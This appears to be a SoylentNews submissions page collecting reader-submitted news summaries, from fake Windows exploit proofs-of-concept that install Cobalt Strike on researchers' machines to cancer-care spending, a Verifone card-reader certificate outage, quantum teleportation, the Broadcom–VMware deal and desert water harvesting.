SoylentNews

upstart writes:

Instead of getting exploit PoC, they're getting something a lot more sinister:

It's common practice for researchers to publish a PoC [Proof-of-Concept] of recently patched flaws on code repositories, such as GitHub. That way, they can test different solutions among themselves and force admins to apply the fixes as soon as possible.

When Microsoft patched two remote code execution vulnerabilities, tracked as CVE-2022-24500 and CVE-2022-26809, a few PoCs popped up on GitHub, one of them coming from an account named "rkxxz".

However, the PoC turned out to be bogus, and what it did instead was install Cobalt Strike beacons on the researchers' endpoints. [...]

Fake Windows exploits target infosec community with Cobalt Strike:

This is not the first time threat actors have targeted vulnerability researchers and pentesters.

In January 2021, the North Korean Lazarus hacking group targeted vulnerability researchers through social media accounts and zero-day browser vulnerabilities.

In March 2021, North Korean hackers again targeted the infosec community by creating a fake cybersecurity company called SecuriElite (located in Turkey).

In November, the Lazarus hacking conducted another campaign using a trojanized version of the IDA Pro reverse engineering application that installed the NukeSped remote access trojan.

By targeting the infosec community, threat actors not only gain access to vulnerability research the victim may be working on but may also potentially gain access to a cybersecurity company's network.

Original Submission

upstart writes:

An interesting history story about a French embroiderer who helped revolutionize surgery:

On June 25, 1894, the French President Marie François Sadi Carnot attended a banquet at the Chamber of Commerce in Lyon. [...] One man present, Sante Geronimo Caserio, [...] revealed a dagger, which he plunged deep into Carnot's back. [...]

The surgical trainee Alexis Carrel was, like his fellow countrymen, appalled by the assassination, but he directed his ire not towards things Italian, rather the impotence of his profession. Carrel believed that, if only Carnot's doctors had possessed the skill, they'd have been able to save the president's life.

[...] He soon found that, even with recent advances in surgery, the thread surgeons used was too thick for tiny blood vessels, which would easily tear. The needles were too bulky, too, [...] If he was going to attempt to sew vessels together, he would need better. With nothing very delicate available at surgical suppliers of the time, Carrel turned to Lyon's famous embroiderers. [...]

The woman he went to see was called Marie-Anne Leroudier, one of Lyon's finest embroiderers. Leroudier isn't always mentioned in Carrel's biographies. [...] But if you take the trouble to look up her work, it's unfathomably intricate. [...]

hubie writes:

High cost of cancer care in the U.S. doesn't reduce mortality rates:

While the U.S. spends twice as much on cancer care as the average high-income country, its cancer mortality rates are only slightly better than average, according to a new analysis by researchers at Yale University and Vassar College.

[...] The researchers found that national cancer care spending showed no relationship to population-level cancer mortality rates. "In other words, countries that spend more on cancer care do not necessarily have better cancer outcomes," said Chow.

[...] Smoking is the strongest risk factor for cancer mortality, and smoking rates have historically been lower in the United States, compared to other countries. When the researchers controlled for international variations in smoking rates, U.S. cancer mortality rates became no different than the average high-income country, with nine countries — Australia, Finland, Iceland, Japan, Korea, Luxembourg, Norway, Spain, and Switzerland — having lower smoking-adjusted cancer mortality than the United States.

[...] "The pattern of spending more and getting less is well-documented in the U.S. healthcare system; now we see it in cancer care, too," said co-author Elizabeth Bradley, president of Vassar College and professor of science, technology, and society. "Other countries and systems have much to teach the U.S. if we could be open to change."

Journal Reference:
Ryan D. Chow, Elizabeth H. Bradley, Cary P. Gross. Comparison of Cancer-Related Spending and Mortality Rates in the US vs 21 High-Income Countries, JAMA Health Forum. 2022;3(5):e221229. DOI:10.1001/jamahealthforum.2022.1229

Original Submission

Rich writes:

A digital certificate that expired after 10 years is causing a major outage in German retail payment handling. The involved Verifone H5000 card reader was introduced in 2012 but is still widely in use. Acceptance points have been advised to not power off their devices, because on startup, the failing certificate locks out the device even from updates. The vendor is trying to come up with a solution, which will likely involve USB sticks for local updates.

Report in English: https://www.stripes.com/theaters/europe/2022-05-27/aaefes-esso-credit-card-outage-6146620.html

Details in German (with screenshots): https://www.borncity.com/blog/2022/05/27/strung-der-verifone-h5000-ec-kartenlesegerte-einige-insights-zur-zertifikateproblematik/

While in the past, many issues could be fixed by cleverly scraping together remaining data, this is one of the first nationwide occurrences of a new class of security-related bugs that actively lock out any solution attempt. What is your experience in this field?

Original Submission

hubie writes:

Knowledge-Diverse Work Teams Benefit from Fluid Hierarchies:

Co-workers who team up to solve problems or work on projects can benefit when they have less in common and take turns spotlighting their different expertise, according to new research from The University of Texas at Austin. The findings have implications for how managers can better form and manage teams so all voices are heard.

Groups of workers with varied knowledge — or "knowledge-diverse teams" — share more information among group members, a key trait of effective teamwork. [...]

"For teams, instability is often seen as a negative," Gray said. "But we found a scenario in which instability is helpful. Within a diverse team, this type of fluidity helps members bolster their position and standing by demonstrating their expertise and unique value."

Even so, homogenous teams — ones made up of members with similar knowledge and skills — share more when members' influence over time is stable.

A knowledge-diverse new product development team could include a scientist, engineer, operations expert and a marketer, while a startup team may have a chief technology officer, chief marketing officer and chief financial officer. In contrast, a homogenous team might be made of sales members who do the same task but may have different kinds of customers.

[...] Workers who are a part of a knowledge-diverse team where influence diverges should know that by sharing information, they can demonstrate their worth to co-workers and gain greater influence and trust within the team. Gray said managers need to understand that it's insufficient to bring together people with diverse knowledge and simply set them on a task. Instead, managers of knowledge-diverse teams need to think about how they can help to elevate different viewpoints as tasks evolve. Managers of homogenous teams should mull how they might promote stability so members don't compete for status.

What were the makeups of the best and worst collaborative teams you've worked on? Is any of this important, or do the variabilities in skills and experience between people wash all this out and team effectiveness is just one big stochastic crapshoot?

Journal Reference:
Steven M. Gray et al., Leveraging Knowledge Diversity in Hierarchically Differentiated Teams: The Critical Role of Hierarchy Stability, Acad Manage J, 2022
DOI: 10.5465/amj.2020.1136

Original Submission

upstart writes:

Climate change reveals unique artifacts in melting ice patches:

Sometime around 2000 BCE, a red-wing thrush died at Skirådalskollen in the Dovrefjell mountain range. Its small body quickly became buried under an ice patch. Upon emerging again 4,000 years later, its internal organs are still intact.

In recent years, hundreds of such discoveries have been made in ice patches, revealing traces of hunting, trapping, traffic, animals and plant life -- small, frozen moments of the past.

[...] "A survey based on satellite images taken in 2020 shows that more than 40 per cent of 10 selected ice patches with known finds have melted away. These figures suggest a significant threat for preserving discoveries from the ice, not to mention the ice as a climate archive," says Skar.

"The time is ripe for establishing a national monitoring programme using remote sensing and systematically securing archaeological finds and biological remains from ice patches. We should also use this programme to collect glaciological data from different parts of the country, since the ice patches can provide detailed data on how the climate has evolved over the last 7500 years," she said.

[...] "We used to think of the ice as desolate and lifeless and therefore not very important. That's changing now, but it's urgent. Large amounts of unique material are melting out and disappearing forever. Finds can provide important information about the history of both people and nature," he said.

Archaeology Report

Original Story Source

Original Submission

hubie writes:

Quantum information teleported across a rudimentary quantum network:

The power of a future quantum Internet is based on the ability to send quantum information (quantum bits) between the nodes of the network. This will enable all kinds of applications such as securely sharing confidential information, linking several quantum computers together to increase their computing capability, and the use of highly precise, linked quantum sensors.

[...] In order to be able to teleport quantum bits, several ingredients are required: a quantum entangled link between the sender and receiver, a reliable method for reading out quantum processors, and the capacity to temporarily store quantum bits. Previous research at QuTech demonstrated that it is possible to teleport quantum bits between two adjacent nodes. The researchers at QuTech have now shown for the first time that they can meet the package of requirements and have demonstrated teleportation between non–adjacent nodes, in other words over a network. They teleported quantum bits from node "Charlie" to node "Alice", with the help of an intermediate node "Bob".

Also included is a explanatory video.

See also:
The New York Times, El Pais, New Scientist (international edition), De Volkskrant, hardware.info, Nature News & Views, and Physics World

Journal Reference:
S.L.N. Hermans et al., Qubit teleportation between non-neighboring nodes in a quantum network, Nature, 2022, DOI: 10.1038/s41586-022-04697-y

Original Submission

AnonTechie writes:

https://phys.org/news/2022-05-disinformation-flourished-pandemic.html

A small team of researchers at Sony Computer Science Laboratories in France has explored why disinformation seemed to flourish during the global pandemic.

One of the more remarkable features of the global pandemic is the seemingly unceasing stream of misinformation attributed not just to the virus and the people who were being infected, but in the ways the medical community has responded to the threat. From ridiculous claims regarding supposed cures to the baseless claims made by anti-vaxxers, misinformation has flourished. In this new effort, the researchers wondered why this has been happening and they looked at the sources of news, both reliable and unreliable, as participants in a supply and demand news ecosystem.

[...] The researchers were not able to ascertain why the unreliable news sources were able to respond more quickly, but suggest that the end result was higher visibility for unreliable sources, leading to widespread disinformation gaining traction, and ultimately, acceptance.

[Journal Reference]: Pietro Gravino et al, The supply and demand of news during COVID-19 and assessment of questionable sources production, Nature Human Behaviour (2022)
DOI: DOI: 10.1038/s41562-022-01353-3

Do you agree with this assessment?

Original Submission

upstart writes:

Why are male mice afraid of bananas?:

Researchers from McGill University have identified a form of chemical signaling in mice to defend their offspring. The researchers found that proximity to pregnant and lactating female mice increased stress hormones in males and even decreased their sensitivity to pain.

"The findings have important implications for improving the reliability and reproducibility of experiments involving mice. This is yet another example of a previously unknown factor in the lab environment that can affect the results of scientific studies," says Jeffrey Mogil, a Professor in the Department of Psychology at McGill University and E. P. Taylor Chair in Pain Studies.

According to co-author Sarah Rosen, "what is likely happening is that female mice are signaling to males who might be considering attacking their babies that they will defend them vigorously. It's the threat of the possible upcoming fight that causes the stress."

"Mice have richer communication with one another than we think; it's just that a lot of it's through smell," says Mogil. The researchers started looking for the olfactory chemical responsible. Several odorants were identified, but one, n-pentyl acetate, which is released in the urine of pregnant and lactating female mice, was especially effective at producing stress in male mice.

"Curiously, n-pentyl acetate is also responsible for the unique smell of bananas. After a quick trip to the supermarket for some banana oil, we were able to confirm that the smell of banana extract stressed the male mice just as much as the pregnant females," says co-author Lucas Lima.

Journal Reference:
Sarah F. Rosen et al, Olfactory exposure to late-pregnant and lactating mice causes stress-induced analgesia in male mice, Science Advances (2022) (DOI: 10.1126/sciadv.abi9366)

Original Submission

upstart writes:

Clearview AI fined in UK for illegally storing facial images:

Facial recognition company Clearview AI has been fined more than £7.5m by the UK's privacy watchdog and told to delete the data of UK residents.

The company gathers images from the internet to create a global facial recognition database.

The Information Commissioner's Office (ICO) says that breaches UK data protection laws. It has ordered the firm to stop obtaining and using the personal data of UK residents.

Clearview AI chief executive Hoan Ton-That said: "I am deeply disappointed that the UK Information Commissioner has misinterpreted my technology and intentions.

"We collect only public data from the open internet and comply with all standards of privacy and law.

Clearview AI takes publicly posted pictures from Facebook, Instagram and other sources, usually without the knowledge of the platform or any permission.

upstart writes:

Broadcom to acquire VMware in massive $61B deal – TechCrunch:

Sometimes when there is smoke, there is actually fire. Such was the case with the rumors of Broadcom's interest in VMware this past weekend. It turns out that fire was burning hot, and today, Broadcom announced it is acquiring VMware in a massive $61 billion deal.

The deal is a combination of cash and stock, with Broadcom assuming $8 billion in VMware debt.

With VMware, Broadcom gets more than the core virtualization, which the company was built on. It also gets other pieces it acquired along the way to diversify, like Heptio for containerization, and Pivotal, which helps provide support services for companies transitioning to modern technology. At the same time it bought Pivotal, it also acquired security company Carbon Black.

That touches upon a lot of technology, but it begs the question, where does it all fit with Broadcom (which has spent a fair amount of money in recent years buying up a couple of key software pieces prior to today's announcement)?

[...] VMware CEO Raghu Raghuram put the typical positive spin on the deal about the two companies being better together. "Combining our assets and talented team with Broadcom's existing enterprise software portfolio, all housed under the VMware brand, creates a remarkable enterprise software player," he said in a statement, referring to those two other pieces Broadcom already owns.

Also reported at:

• reuters.com
• https://www.engadget.com
• https://www.cnbc.com/

Previously: Broadcom in Talks to Buy Cloud Computing Firm VMWare

Original Submission #1  Original Submission #2 

Phoenix666 writes:

Phys.org:

This year is the worst start to the wildfire season in the past decade. More than 3,737 square miles (9,679 square kilometers) have burned across the U.S., almost triple the 10-year average.

With no shortage of burn scars around the West, researchers and private groups such as The Nature Conservancy have been tapping New Mexico State University's center for seedlings to learn how best to restore forests after the flames are extinguished.

The center has provided sprouts for projects in New Mexico, Arizona, Colorado, Utah, Texas and California, but experts said its capacity for turning out as many as 300,000 seedlings annually isn't enough now and certainly won't be in the future as climate change and drought persist.

[...] If the West wants to keep its forests, policymakers need to think about it in economic terms that would have significant benefits for water supplies, recreation and the rural and tribal communities that hold these mountain landscapes sacred, said Collin Haffey, forest and watershed health coordinator with the New Mexico Forestry Division.

Are direct human interventions like re-planting after forest fires enough to hold back climate change?

Original Submission

upstart writes:

World's largest vertical strawberry farm opens in Jersey City:

Damn, that's sweet: Controlled environment agriculture company Oishii has opened the world's largest vertical strawberry farm at the old Anheuser-Busch factory in Jersey City, growing strawberries five rows deep in the retrofitted 74,000-square-foot facility.

The expanded growing capacity will allow the company to decrease the sticker shock on its berries, which until May 18 sold for $50 per 11-pack of medium berries at high-end grocery stores like Van Hook Cheese & Grocery in Jersey City and Montclair. As of May 19, the 11-pack price has dropped to $20, with six-berry trays at $11 and three-berry trays at $6 also available.

Making the berries more affordable was "the whole purpose" of expanding operations and focusing on efficiencies, Oishii co-founder and CEO Hiroki Koga said.

[...] "Now, it's just a matter of how quickly can we deploy these farms across the world," said Koga.

[...] The new facility won't fulfill demand for Oishii's products, and Koga said both New York metro-area farms and farms in other cities are coming down the pike. New produce is on its way, too, specifically tomatoes and melons.

Do you think this scales well and can eventually supply produce at a reasonable price, or will this always serve the niche $2/berry crowd?

Original Submission

upstart writes:

FTC fines Twitter $150M for using 2FA info for targeted advertising:

The Federal Trade Commission has fined Twitter $150 million for using phone numbers and email addresses collected to enable two-factor authentication for targeted advertising.

[...] This is a direct violation of the FTC Act and a 2011 Commission administrative order which banned the company from misrepresenting its security and privacy practices and profiting from deceptively collected data.

[...] Twitter apologized for using phone numbers and email addresses provided for account security like two-factor authentication for advertising in October 2019, saying they "may have been used accidentally for ad targeting."

"We recently discovered that when you provided an email address or phone number for safety or security purposes (for example, two-factor authentication) this data may have inadvertently been used for advertising purposes, specifically in our Tailored Audiences and Partner Audiences advertising system," said the company at the time.

[...] Something very similar happened in 2018 when Facebook built complex advertising profiles for all its users with everything from their 2FA phone numbers to info harvested from their friends' profiles.

Facebook later used the users' 2FA phone numbers as an additional vector to deliver targeted ads.

upstart writes:

Low-cost gel film can pluck drinking water from desert air:

More than a third of the world's population lives in drylands, areas that experience significant water shortages. Scientists and engineers at The University of Texas at Austin have developed a solution that could help people in these areas access clean drinking water.

The team developed a low-cost gel film made of abundant materials that can pull water from the air in even the driest climates. The materials that facilitate this reaction cost a mere $2 per kilogram, and a single kilogram can produce more than 6 liters of water per day in areas with less than 15% relative humidity and 13 liters in areas with up to 30% relative humidity.

[...] "This new work is about practical solutions that people can use to get water in the hottest, driest places on Earth," said Guihua Yu, professor of materials science and mechanical engineering in the Cockrell School of Engineering's Walker Department of Mechanical Engineering. "This could allow millions of people without consistent access to drinking water to have simple, water generating devices at home that they can easily operate."